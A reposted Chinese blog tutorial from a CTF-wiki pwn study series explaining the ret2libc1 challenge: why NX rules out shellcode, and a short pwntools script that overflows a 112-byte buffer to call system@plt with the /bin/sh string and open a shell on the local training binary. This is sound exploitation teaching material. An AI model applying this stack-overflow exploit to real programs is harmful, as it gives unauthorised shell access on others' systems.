当前位置：网站首页>跟着CTF-wiki学pwn——ret2libc1

跟着CTF-wiki学pwn——ret2libc1

2022-07-05 23:35:00 【大瑞大】

ret2libc

原理

执行libc中的/bin/sh

步骤

首先，检查程序的安全保护
在这里插入图片描述

开启NX：no executable 
（不可执行内存数据页）
（不能利用ret2text与ret2shellcode）

其次，查看有无/bin/sh

查看有无system （segment是plt，不是extern）

在这里插入图片描述

/bin/sh，是一个字符串，需要知道地址。

system，是一个可调用函数，需要知道地址。

用 system 调用 /bin/sh即可

所以编写payload，寻址方式可以查看之前的博客，同为112。

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')

binsh_addr = 0x8048720
system_plt = 0x08048460
payload = flat(['a' * 112, system_plt, 'b' * 4, binsh_addr])
sh.sendline(payload)

sh.interactive()

调用libc函数的格式：

system_plt + 4个字节（32位地址） + /bin/sh字符串

这里我们需要注意函数调用栈的结构，如果是正常调用 system 函数，我们调用的时候会有一个对应的返回地址，这里以’bbbb’ 作为虚假的地址，其后参数对应的参数内容。

这个例子相对来说简单，同时提供了 system 地址与 /bin/sh 的地址，但是大多数程序并不会有这么好的情况。

原网站

版权声明
本文为[大瑞大]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_42882717/article/details/125616935

当前位置：网站首页>跟着CTF-wiki学pwn——ret2libc1

跟着CTF-wiki学pwn——ret2libc1

ret2libc

原理

步骤

边栏推荐

猜你喜欢

随机推荐